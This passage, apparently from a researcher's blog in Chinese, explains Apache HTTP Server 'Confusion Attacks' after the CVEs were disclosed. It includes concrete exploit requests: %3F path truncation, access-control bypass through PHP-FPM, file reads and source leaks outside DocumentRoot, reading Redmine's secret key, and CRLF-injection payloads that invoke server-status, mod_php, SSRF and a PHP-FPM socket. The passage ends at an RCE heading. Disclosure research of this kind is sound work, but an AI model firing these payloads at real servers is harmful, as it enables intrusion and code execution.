  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

這些漏洞都透過官方的安全信箱回報,並由 Apache HTTP Server 團隊在 2024-07-01 發佈安全性通報以及 2.4.60 更新 (詳細可參考官方公告)。

由於這是一個針對 Httpd 架構以及其內部機制所帶來的新攻擊面,理所當然第一個參與的人可以找到最多漏洞,因此我也是目前擁有最多 Apache HTTP Server CVE 的人 😉,導致很多更新修復由於其歷史架構無法向下兼容。 所以對於很多運行許久的正式伺服器來說修復並不是一件容易的事,若網站管理員不經思考就直接更新反而會打破許多舊有的設定造成服務中斷。 😨

接下來就開始介紹這次發展出來的攻擊們吧!


🔥 1. Filename Confusion

首先,第一個是基於 Filename 欄位上的 Confusion,從字面上來看 r->filename應該是一個檔案系統路徑,然而在 Httpd 中,有些模組會把它當成網址來處理。 如果在 HTTP 請求的上下文中,有些模組把 r->filename當成檔案路徑,而其他模組將它當成網址,這其中的不一致就會造成安全上的問題!


⚔️ Primitive 1-1. Truncation

所以哪些模組會把 r->filename當成網址呢? 首先是 mod_rewrite允許網站管理員透過 RewriteRule語法輕鬆的將路徑透過指定的規則改寫:

RewriteRule Pattern Substitution [flags]

其中目標可以是一個檔案系統路徑或是一個網址,我想這應該是一個為了使用者體驗所做出的方便,但同時這個「方便」也帶出了一些風險,例如在改寫路徑時,mod_rewrite會強制把結果視為網址處理 (splitout_queryargs()),這導致了在 HTTP 請求中可以透過一個問號 %3F去截斷 RewriteRule後面的路徑或網址,並引出以下兩種攻擊手法。

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */staticintapply_rewrite_rule(rewriterule_entry*p,rewrite_ctx*ctx){ap_regmatch_tregmatch[AP_MAX_REG_MATCH];apr_array_header_t*rewriteconds;rewritecond_entry*conds;// [...]for(i=0;i<rewriteconds->nelts;++i){rewritecond_entry*c=&conds[i];rc=apply_rewrite_cond(c,ctx);// [...] do the remaining stuff}/* Now adjust API's knowledge about r->filename and r->args */r->filename=newuri;if(ctx->perdir&&(p->flags&RULEFLAG_DISCARDPATHINFO)){r->path_info=NULL;}splitout_queryargs(r,p->flags);// <------- [!!!] Truncate the `r->filename`// [...]}
✔️ 1-1-1. Path Truncation

首先,第一個攻擊手法是檔案系統路徑上的截斷,想像下面這個 RewriteRule

RewriteEngineOnRewriteRule"^/user/(.+)$""/var/user/$1/profile.yml"

伺服器會根據網址路徑 /user/後的使用者名稱開啟相對應的個人設定檔案,例如:

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

由於 mod_rewrite會強制將重寫後的結果當成一個網址處理,因此雖然目標是一個檔案系統路徑,但卻可以透過一個問號去截斷後方的 /profile.yml例如:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`

這是我們的第一個攻擊手法 —— 路徑截斷。 對於這個攻擊手法的探索先稍稍停留在這邊,雖然目前看起來還只是一個小瑕疵,但請先記好它,因為這會在之後的攻擊中一再的出現,慢慢把這個看似無用的小破口撕裂開來! 😜

✔️ 1-1-2. Mislead RewriteFlag Assignment

截斷手法的第二個利用是誤導 RewriteFlag的設置,想像網站管理員透過下列的 RewriteRule去管理網站中路徑以及相對應模組:

RewriteEngineOnRewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

如果請求附檔名是 .php結尾則加上 mod_php相對應的處理器 (此外也可以是環境變數或是 Content-Type,關於標誌的詳細設定可參考官方的手冊 RewriteRule Flags)。

由於 mod_rewrite的截斷行為發生在正規表達式匹配後,因此惡意的攻擊者可以利用原本的規則,透過 ?RewriteFlag設定到不屬於它們的請求上。 例如上傳一個夾帶惡意 PHP 程式碼的 GIF 圖片並透過惡意請求將圖片當成後門執行:

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;>$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)


⚔️ Primitive 1-2. ACL Bypass

Filename Confusion 的第二個攻擊手法發生在 mod_proxy身上,相較前一個攻擊是無條件將目標當成網址處理,這次則是因為模組間對 r->filename的理解不一致所導致的認證及存取控制繞過

mod_proxy會將 r->filename當成網址這件事情其實很合理,因為原本 Proxy 的目的就是將請求「導向」到其它網址上,但安全往往就是單獨拿出來看沒問題,搭配在一起就出問題了! 特別是當大多數模組預設將 r->filename視為檔案系統路徑時,試想一下假設今天你使用基於檔案系統的存取控制模組,而現在 mod_proxy又會把 r->filename當成網址,這其中的不一致就可以導致存取控制或是認證被繞過!

一個經典的例子是,網站管理員透過 Files語法去對單一檔案加上限制,例如 admin.php

<Files"admin.php">
AuthTypeBasicAuthName"Admin Panel"AuthUserFile"/etc/apache2/.htpasswd"Require valid-user
</Files>

在預設安裝的 PHP-FPM 環境中,這種設定可以被直接繞過! 順道一提這也是 Apache HTTP Server 中最常見到的認證方式! 假設今天你瀏覽了這樣的網址:

http://server/admin.php%3Fooo.php

首先在這個網址的 HTTP 生命週期中,認證模組會將請求的檔案名稱與被保護的檔案進行比對,此時 r->filename欄位是 admin.php?ooo.php理所當然與 admin.php不符合,於是模組會認為當前請求不需要認證。 然而 PHP-FPM 的設定檔案又設定當收到結尾為 .php的請求時透過 SetHandler語法將請求轉交給 mod_proxy

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that# avoid capturing the matching pattern (as $1) which isn't used here<FilesMatch".+\.ph(?:ar|p|tml)$">
SetHandler"proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"</FilesMatch>

mod_proxy會將 r->filename重寫成以下網址並根據其中的協議呼叫子模組 mod_proxy_fcgi處理後續 FastCGI 協議的邏輯:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

由於這時後端在收到檔案名稱時已經是一個奇怪的格式了,PHP-FPM 只好對這個行為做特別處理,其中處理的邏輯如下:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"if(env_script_filename&&strncasecmp(env_script_filename,APACHE_PROXY_FCGI_PREFIX,sizeof(APACHE_PROXY_FCGI_PREFIX)-1)==0){/* advance to first character of hostname */char*p=env_script_filename+(sizeof(APACHE_PROXY_FCGI_PREFIX)-1);while(*p!='\0'&&*p!='/'){p++;/* move past hostname and port */}if(*p!='\0'){/* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */memmove(env_script_filename,p,strlen(p)+1);apache_was_here=1;}/* ignore query string if sent by Apache (RewriteRule) */p=strchr(env_script_filename,'?');if(p){*p=0;}}

可以看到 PHP-FPM 先對檔案名稱正規化並對其中的問號 ?進行分隔取出其中實際的檔案路徑並執行 (也就是 /var/www/html/admin.php)。 所以基本上所有使用 Files語法針對單一 PHP 檔案的認證或是存取控制設定在運行 PHP-FPM 的情境下都存在風險!😮

從 GitHub 上可以找到非常多潛在有風險的設定,例如被限制在只有內網才能存取的 phpinfo()

# protect phpinfo, only allow localhost and local network access<Files php-info.php>
# LOCAL ACCESS ONLY# Require local # LOCAL AND LAN ACCESSRequire ip 10 172 192.168
</Files>

使用 .htaccess阻擋起來的 Adminer:

<Files adminer.php>
Order Allow,Deny
    Denyfromall</Files>

被保護起來的 xmlrpc.php

<Files xmlrpc.php>
Order Allow,Deny
    Denyfromall</Files>

防止直接存取的命令行工具:

<Files"cron.php">
Denyfromall</Files>

透過認證模組以及 mod_proxy間對 r->filename欄位理解的不一致,上面所有的例子都可以透過一個 ?成功繞過!


🔥 2. DocumentRoot Confusion

接下來要介紹的攻擊是基於 DocumentRoot 上的 Confusion Attack! 首先你可以思考一下,對於下面這樣子的 Httpd 設定:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

當瀏覽 http://server/html/about時,到底實際 Httpd 會開啟哪個檔案? 是根目錄下的 /about.html還是 DocumentRoot 下的 /var/www/html/about.html呢?

答案是 —— 兩個路徑都會存取。 這也是我們的第二個 Confusion Attack,對於任意[1]RewriteRule,Httpd 總是會嘗試開啟帶有 DocumentRoot 的路徑以及沒有的路徑!有趣吧 😉

[1] 位於 Server ConfigVirtualHost Block

Path: modules/mappers/mod_rewrite.c#L4939

if(!(conf->options&OPTION_LEGACY_PREFIX_DOCROOT)){uri_reduced=apr_table_get(r->notes,"mod_rewrite_uri_reduced");}if(!prefix_stat(r->filename,r->pool)||uri_reduced!=NULL){// <------ [1] access without rootintres;char*tmp=r->uri;r->uri=r->filename;res=ap_core_translate(r);// <------ [2] access with rootr->uri=tmp;if(res!=OK){rewritelog((r,1,NULL,"prefixing with document_root of %s"" FAILED",r->filename));returnres;}rewritelog((r,2,NULL,"prefixed with document_root to %s",r->filename));}rewritelog((r,1,NULL,"go-ahead with %s [OK]",r->filename));returnOK;}

當然絕大部分的情況是目標檔案不存在,於是 Httpd 會存取帶有 DocumentRoot 的版本,但這個行為已經讓我們能夠「故意的」去存取 Web Root 以外的路徑,如果今天可以控制 RewriteRule的目標前綴那我們是不是就能瀏覽作業系統上的任意檔案了?這也是我們第二個 Confusion Attack 的精神! 從 GitHub 中可以找到千千萬萬個有問題的寫法,有趣的是甚至連官方的範例文件都是易遭受攻擊的:

# Remove mykey=???RewriteCond"%{QUERY_STRING}""(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"RewriteRule"(.*)""$1?%1%3"

除此之外還有其它亦受影響的 RewriteRule例如基於快取需求或是將想副檔名隱藏起來的 URL Masking 規則:

RewriteRule"^/html/(.*)$""/$1.html"

或是想節省流量,嘗試使用壓縮版本的靜態檔案規則:

RewriteRule"^(.*)\.(css|js|ico|svg)""$1\.$2.gz"

將老舊的網站轉址到根目錄的規則:

RewriteRule"^/oldwebsite/(.*)$""/$1"

對所有 CORS 的預檢請求都回傳 200 OK 的規則:

RewriteCond %{REQUEST_METHOD} OPTIONSRewriteRule ^(.*)$ $1 [R=200,L]

理論上只要 RewriteRule的目標前綴可控,我們可以瀏覽幾乎整個檔案系統,但從前面的規則中發現還有一個限制我們必須跨過的,前面例子中所出現的副檔名如 .html以及 .gz的後綴都是讓我們沒那麼地自由的一個限制 —— 所以可以繞過這個限制嗎? 不知道有沒有人想起前面在 Filename Confusion 章節所介紹的路徑截斷,透過這兩個攻擊的結合,我們可以自由的瀏覽作業系統上的任意檔案!

接下來的範例都基於這個不安全的 RewriteRule來做示範:

RewriteEngineOnRewriteRule"^/html/(.*)$""/$1.html"


⚔️ Primitive 2-1. Server-Side Source Code Disclosure

首先來介紹 DocumentRoot Confusion 的第一個攻擊手法 —— 任意伺服器端程式碼洩漏

由於 Httpd 會根據當前目錄或是當前虛擬主機設定決定是否當成 Server-Side Script 處理,因此透過絕對路徑去存取目標程式碼可以混淆 Httpd 的邏輯導致洩漏原本該被當成程式碼執行的檔案內容。

✔️ 2-1-1. Disclose CGI Source Code

首先是洩漏伺服器端的 CGI 程式碼,由於 mod_cgi是透過 ScriptAlias將 CGI 目錄與所指定的 URL 前綴綁定起來,當使用絕對路徑直接瀏覽 CGI 時由於 URL 前綴變了,因此可以直接洩漏出檔案原始碼。

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl# use CGI;# ...# # the source code of download.cgi
✔️ 2-1-2. Disclose PHP Source Code

接著是洩漏伺服器端的 PHP 程式碼,由於 PHP 的使用場景眾多,若只針對特定目錄或是虛擬主機套用 PHP 環境的話 (常見於網站代管服務),可以透過未啟用 PHP 的虛擬主機存取 PHP 檔案以洩漏原始碼!

例如 www.local以及 static.local兩個虛擬主機都託管在同一台伺服器上,www.local允許運行 PHP 而 static.local則純粹負責處理靜態檔案,因此可以透過下面的方式洩漏出 config.php內的敏感資訊:

$ curl http://www.local/config.php
 # the processed result (empty) from config.php$ curl http://www.local/var/www.local/config.php%3F -H"Host: static.local"# the source code of config.php


⚔️ Primitive 2-2. Local Gadgets Manipulation!

接下來是我們的第二個攻擊手法 —— Local Gadgets Manipulation

首先,在前面介紹到「瀏覽作業系統上的任意檔案」時不知道你有沒有好奇: 「欸那是不是一個不安全的 RewriteRule就可以存取到 /etc/passwd?」 對的 —— 但也不完全對。 蛤?

技術上來說確實伺服器會去檢查 /etc/passwd是否存在,但 Apach HTTP Server 內建的存取控制阻擋了我們的存取,這裡是 Apache HTTP Server 的設定檔模板內容

<Directory />
AllowOverrideNoneRequireall denied
</Directory>

會觀察到預設阻擋了根目錄 /的瀏覽 (Require all denied),然而實際上這就沒戲了嗎? 實際上再詳細追查各個 Httpd 的發行版會發現 Debian/Ubuntu作業系統預設允許了 /usr/share

<Directory /usr/share>
AllowOverrideNoneRequireall granted
</Directory>

所以我們的「任意檔案存取」似乎有點那麼地不任意。 不過我們打破原本只能瀏覽 DocumentRoot 的信任算是跨出很大的一步了。 接下來要做的事情就是「壓榨」這個目錄內的各種可能。 所有可利用的資源、目錄中現有的教學範例、說明文件、單元測試檔案,甚至伺服器上程式語言如 PHP、Python 甚至 PHP 的模組都有機會成為我們濫用的對象!

P.S. 當然上面只是基於 Ubuntu/Debian 作業系統發行的 Httpd 版本設定做解釋,實務上也有發現一些應用軟體直接把的根目錄的 Require all denied移除導致可以直接存取 /etc/passwd

✔️ 2-2-1. Local Gadget to Information Disclosure

首先來尋找看看這個目錄下是否存在這一些檔案是可以利用的。 首先是目標 Apache HTTP Server 如果安裝 websocketd這個服務的話,服務套件預設會在 /usr/share/doc/websocketd/examples/php/下放置一個範例 PHP 程式碼 dump-env.php,如果目標伺服器上存在 PHP 環境的話可以直接存取這個範例程式去洩漏敏感的環境變數。

另外如果目標同時安裝如 Nginx 或是 Jetty 的話,雖然 /usr/share理論上該是套件安裝時所存放的唯讀複本,但這些服務的預設 Web Root 就在 /usr/share下,因此也能透過這個攻擊手法去洩漏這些網頁應用的敏感資訊,例如 Jetty 上的 web.xml設定等等:

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

這裡簡單展示一個透過存取 Davical套件所存在的 setup.php唯讀複本去洩漏 phpinfo()內容。

✔️ 2-2-2. Local Gadget to XSS

接著如何把這個攻擊手法轉化成 XSS 呢? 在 Ubuntu Desktop 環境中預設會安裝 LibreOffice 這套開源的辦公室應用,利用其中幫助文件的語言切換功能來完成 XSS。

Path: /usr/share/libreoffice/help/help.html

varurl=window.location.href;varn=url.indexOf('?');if(n!=-1){// the URL came from LibreOffice help (F1)varversion=getParameterByName("Version",url);varquery=url.substr(n+1,url.length);varnewURL=version+'/index.html?'+query;window.location.replace(newURL);}else{window.location.replace('latest/index.html');}

因此就算目標沒有部屬任何網頁應用,我們也可以利用一個不安全的 RewriteRule透過作業系統自帶的檔案來創造出 XSS。

✔️ 2-2-3. Local Gadget to LFI

至於任意檔案讀取呢? 如果目標伺服器上安裝了一些 PHP 甚至前端應用套件,例如 JpGraph、jQuery-jFeed 甚至 WordPress 或 Moodle 外掛,那麼它們自帶的使用教學或是除錯用程式碼都可以變成利用的對象,例如:

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

這裡展示利用 jQuery-jFeed 所自帶的 proxy.php來讀取 /etc/passwd

✔️ 2-2-4. Local Gadget to SSRF

當然找到一個 SSRF 也不在話下,例如 MagpieRSS 提供了一個 magpie_debug.php檔案就是一個絕佳的小工具:

  • /usr/share/php/magpierss/scripts/magpie_debug.php
✔️ 2-2-5. Local Gadget to RCE

所以能 RCE 嗎? 別急我們先慢慢來! 首先這個攻擊手法已經可以把既有的攻擊面全部重新套用一次了,例如在某次開發過程中不小心被遺留下來 (甚至可能還是被第三方套件所依賴的) 的舊版本 PHPUnit,可以直接使用 CVE-2017-9841來執行任意程式碼,又或者是安裝完 phpLiteAdmin (由於是唯讀副本所以預設密碼是 admin),相信看到這邊會發現 Local Gadgets Manipulation 這個攻擊手法存在著無窮潛力,剩下只是發掘出更厲害以及更通用的小工具!


⚔️ Primitive 2-3. Jailbreak from Local Gadgets

看到這裡你可能會好奇: 「真的不能跳出 /usr/share嗎?」 當然可以,這也是要介紹的第三個攻擊手法 —— /usr/share中越獄!

Debian/Ubuntu的 Httpd 發行版中預設開啟了 FollowSymLinks選項,就算非 Debian/Ubuntu 發行版但 Apache HTTP Server 也隱含地預設允許符號連結

<Directory />
OptionsFollowSymLinksAllowOverrideNoneRequireall denied
</Directory>
✔️ 2-3-1. Jailbreak from Local Gadgets

因此只要有套件在它的安裝目錄下符號連結到 /usr/share外,這個符號連結就成為一個跳板去存取更多的小工具完成更多的利用。 這裡列出一些我們已經發現可利用的符號連結:

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

越獄攻擊手法的最後讓我們展示一個利用 Redmine 的雙層符號連結跳躍去完成 RCE 的例子。 在預設安裝的 Redmine 程式碼目錄中有個 instances/目錄指向 /var/lib/redmine/,而位於 /var/lib/redmine/下的 default/config/目錄又指向 /etc/redmine/default/資料夾,裡面存放著 Redmine 的資料庫設定以及應用程式私密金鑰。

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

於是透過一個不安全的 RewriteRule以及兩層符號連結,我們能夠輕鬆存取到 Redmine 所使用的應用程式金鑰:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405

而 Redmine 又是基於 Ruby on Rails 所開發的應用程式,其中 secret_key.txt的內容其實正是其簽章加密所使用到的金鑰,接下來的流程相信對熟悉攻擊 RoR 的同學應該不陌生,透過已知的金鑰將惡意 Marshal 物件簽章加密後嵌入 Cookie,接著透過伺服器端的反序列化最終實現遠端程式碼執行!


🔥 3. Handler Confusion

最後一個要介紹的攻擊是 Handler 上的 Confusion。 這個攻擊同樣也利用了一個 Apache HTTP Server 從上古時期架構所遺留下來的技術債。這裡透過一個例子來讓讀者快速的了解這個技術債 —— 如果今天想在 Httpd 上運行經典的 mod_php,下面兩個語法設定你覺得哪個才是正確的?

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

答案是 —— 兩個都可以正確地讓 PHP 運行起來! 這裡分別是兩個設定的語法格式,可以看到兩個設定不僅用法、參數類似,現在連效果都一模一樣,為什麼 Apache HTTP Server 當初要設計兩個不同的語法?

AddHandlerhandler-nameextension [extension] ...
AddTypemedia-typeextension [extension] ...

實際上 handler-name以及 media-type在 Httpd 的內部結構中代表著不同的欄位,分別對應到 r->handler以及 r->content_type。 而使用者可以在沒有感知的情況下使用則歸功於一段從 1996 年 Apache HTTP Server 開發初期就遺留到現在的程式碼

Path: server/config.c#L420

AP_CORE_DECLARE(int)ap_invoke_handler(request_rec*r){// [...]if(!r->handler){if(r->content_type){handler=r->content_type;if((p=ap_strchr_c(handler,';'))!=NULL){char*new_handler=(char*)apr_pmemdup(r->pool,handler,p-handler+1);char*p2=new_handler+(p-handler);handler=new_handler;/* exclude media type arguments */while(p2>handler&&p2[-1]=='')--p2;/* strip trailing spaces */*p2='\0';}}else{handler=AP_DEFAULT_HANDLER_NAME;}r->handler=handler;}result=ap_run_handler(r);

可以看到在進入主要的模組處理器 ap_run_handler()之前,如果請求中的 r->handler為空則把結構中 r->content_type欄位的內容當成最終將被使用的模組處理器。 這也就是為什麼 AddType以及 AddHandler效果一致的主要理由,因為 media-type最終在執行前還是會被轉換成 handler-name。 我們的第三個 Handler Confusion 主要也就是圍繞在這個行為所發展出來的攻擊。


⚔️ Primitive 3-1. Overwrite the Handler

在理解這個轉換機制後首先第一個攻擊手法是 —— Overwrite the Handler,想像一下如果今天目標的 Apache HTTP Server 透過 AddType將 PHP 運行起來。

AddType application/x-httpd-php  .php

在正常的流程中瀏覽 http://server/config.php。 首先,mod_mime會在 type_checker階段根據 AddType所設定的附檔名將相對應的內容複製到 r->content_type中,由於 r->handler在整個 HTTP 生命週期中並無賦值,於是在執行模組處理器前 ap_invoke_handler()會將 r->content_type當成模組處理器,最終呼叫 mod_php處理請求。

然而如果今天有任何模組在執行到 ap_invoke_handler()前「不小心」把 r->content_type覆寫掉了,那會發生什麼事呢?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

因此這個攻擊手法的第一個利用就是透過這個「不小心」去洩漏任意 PHP 的原始碼。 這個技術最早是由 Max Dmitriev 在 ZeroNights 2021 所發表的研究中提及 (kudos to him!),演講主題及投影片可以從這邊看到:

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

Max Dmitriev 觀察到只要送出錯誤的 Content-Length,遠端 Httpd 伺服器會發生不明的錯誤順帶回傳 PHP 的原始碼,在細追流程後發現其成因是 ModSecurity 在使用 APR (Apache Portable Runtime) 函示庫時並未好好的處理 AP_FILTER_ERROR回傳值所導致的 double response。 由於發生錯誤時 Httpd 想送出一些 HTML 錯誤訊息,於是 r->content_type也順便被覆寫成 text/html

由於 ModSecurity 並未妥善的處理回傳值使得本該停止的 Httpd 內部流程繼續執行,而這個「副作用」又會把原本加上的 Content-Type給覆寫掉,導致最終該被當成 PHP 的檔案被當成一般文件處理並將其中的程式碼及敏感設定印出。 🤫

$ curl -v http://127.0.0.1/info.php -H"Content-Length: x"> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)> Content-Type: text/html;charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title>
...
<?php phpinfo();?>

理論上所有基於 Content-Type的設定語法都容易遭受此類問題影響,所以除了 Max 在投影片中所展示的 php-cgi搭配 mod_actions外,純粹的 mod_php搭配上 AddType也同樣也受影響。

另外值得一提的是,這個副作用在 Apache HTTP Server 版本 2.4.44 時被當成一個增進請求解析器的程式錯誤被更正,於是這個「漏洞」就被當成已修復直到我重新撿起它。 但由於其根本成因還是 ModSecurity 並未好好的處理錯誤,只要找到其它條觸發 AP_FILTER_ERROR的路徑那同樣的行為還是可以重現成功。

P.S. 此問題已於 6/20 透過官方信箱回報給 ModSecurity 並由 Project Co-Leader 建議回到原 GitHub Issue中討論。

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

基於前面提到的 double response行為以及副作用,這個攻擊手法還可以完成其它更酷的利用,不過由於此問題尚未完全修復,更進一步的利用方式,將於修復完成後再揭露。


⚔️ Primitive 3-2. Invoke Arbitrary Handlers

仔細思考前面 Overwrite Handler 攻擊手法,雖然是因為 ModSecurity 並未好好的處理錯誤,導致請求被設置上錯誤的 Content-Type。 但再深入的探究其根本原因應該是 —— Apache HTTP Server 在使用 r->content_type時,其實無從辨別它的語意,這個欄位既可以是在請求階段被語法設定好的值,也可以是回應階段伺服器回傳 Content-Type標頭的內容。

所以理論上如果能控制伺服器回應中 Content-Type標頭的內容,那就可以透過那段從開發初期遺留至今的程式碼呼叫任意的模組處理器,這也是 Handler Confusion 的最後一個攻擊手法 —— 呼叫任意 Apache HTTP Server 的內部模組處理器

但這裡還有最後的一塊拼圖必須填上,在 Httpd 中所有可以從伺服器回應修改到 r->content_type的地方全都發生在那段遺留程式碼之後,就算修改到該欄位的內容,此時 HTTP 生命週期也進入尾聲,無法再做更進一步的利用…… 嗎?

我們找了 RFC 3875來當救援投手! RFC 3875 是一個關於 CGI 的規範,其中 6.2.2. 節定義了一個 Local Redirect Response 行為:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

簡單來說規範了 CGI 在特定條件下必須使用伺服器端的資源去處理轉址,仔細檢視 mod_cgi對於這個規範的實作會發現:

Path: modules/generators/mod_cgi.c#L983

if((ret=ap_scan_script_header_err_brigade_ex(r,bb,sbuf,// <------ [1]APLOG_MODULE_INDEX))){ret=log_script(r,conf,ret,dbuf,sbuf,bb,script_err);// [...]if(ret==HTTP_NOT_MODIFIED){r->status=ret;returnOK;}returnret;}location=apr_table_get(r->headers_out,"Location");if(location&&r->status==200){// [...]}if(location&&location[0]=='/'&&r->status==200){// <------ [2]/* This redirect needs to be a GET no matter what the original
         * method was.
         */r->method="GET";r->method_number=M_GET;/* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */apr_table_unset(r->headers_in,"Content-Length");ap_internal_redirect_handler(location,r);// <------ [3]returnOK;}

首先 mod_cgi會先執行[1] CGI 並掃描其輸出結果並設置上相對應的 Status以及 Content-Type,如果[2]回傳的 Status是 200 以及 Location標頭欄位是 /開頭則把這個回應當成一個伺服器端的轉址並開始處理[3]。 再仔細審視 ap_internal_redirect_handler()的實作會發現:

Path: modules/http/http_request.c#L800

AP_DECLARE(void)ap_internal_redirect_handler(constchar*new_uri,request_rec*r){intaccess_status;request_rec*new=internal_internal_redirect(new_uri,r);// <------ [1]/* ap_die was already called, if an error occured */if(!new){return;}if(r->handler)ap_set_content_type(new,r->content_type);// <------ [2]access_status=ap_process_request_internal(new);// <------ [3]if(access_status==OK){access_status=ap_invoke_handler(new);// <------ [4]}ap_die(access_status,new);}

Httpd 首先創建[1]了一個新的請求結構並將當前的 r->content_type[2]進去,在處[3]完生命週期後呼叫[4]ap_invoke_handler()—— 也就是前面提及包含歷史遺留轉換的地方,所以在伺服器端轉址中,如果可以控制回應標頭,就可以在 Httpd 中呼叫任意的模組處理器。基本上所有 Apache HTTP Server 中的 CGI 系列實作都遵守這個行為,這裡是一個簡單的列表:

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi

至於如何在真實情境中觸發這個伺服器轉址呢? 由於至少需要控制 HTTP 回應中 Content-Type及部分 Location,這裡給出兩個情境以供參考:

  1. 位於 CGI 回應標頭中的 CRLF Injection,透過換行去覆寫已存在的 HTTP 標頭
  2. 可完整控制回應標頭的 SSRF,例如託管在 mod_wsgi上的 django-revproxy專案

接下來的範例都基於這個不安全的 CRLF Injection 來做示範:

#!/usr/bin/perl useCGI;my$q=CGI->new;my$redir=$q->param("r");if($redir=~m{^https?://}){print"Location: $redir\n";}print"Content-Type: text/html\n\n";
✔️ 3-2-1. Arbitrary Handler to Information Disclosure

首先是從任意模組處理器呼叫到資訊洩漏,這裡使用了 Httpd 內建的 server-status模組處理器,這個模組處理器通常只被允許從本機存取:

<Location /server-status>
SetHandler server-status
    Require local
</Location>

在擁有任意模組處理器呼叫後,可以透過複寫 Content-Type去存取原本存取不到的敏感資訊:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

當然也能輕鬆的把一張圖片轉化成 PHP 後門,例如當使用者上傳了一個擁有合法副檔名的檔案後,可以透過這個攻擊手法指定特定模組 mod_php去執行檔案內嵌的惡意程式碼,例如:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Full SSRF

呼叫 mod_proxy存取任何協議以及任意網址當然也不在話下,例如:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3f %0d%0a
%0d%0a

另外這也是一個可以完整控制 HTTP 請求還有取得所有 HTTP 回應的 SSRF! 稍微可惜的一點是在存取 Cloud Metadata 時會被 mod_proxy會自動加上 X-Forwarded-For標頭導致被 EC2 及 GCP 的 Metadata 保護機制阻擋,否則這會是一個更強大的攻擊手法。

✔️ 3-2-3. Arbitrary Handler to Access Local Unix Domain Socket

然而 mod_proxy提供了一個更「方便」的功能 —— 可以存取本地的 Unix Domain Socket! 😉

這裡展示透過存取 PHP-FPM 本地的 Unix Domain Socket 去執行位於 /tmp/下的 PHP 後門:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

這個手法理論上還存在著更多的可能性,例如協議走私 (在 HTTP/HTTPS 協議間走私 FastCGI 😏) 或其它易受影響的 Local Sockets 等,這都交給有興趣的人繼續研究了。

✔️ 3-2-4. Arbitrary Handler to RCE

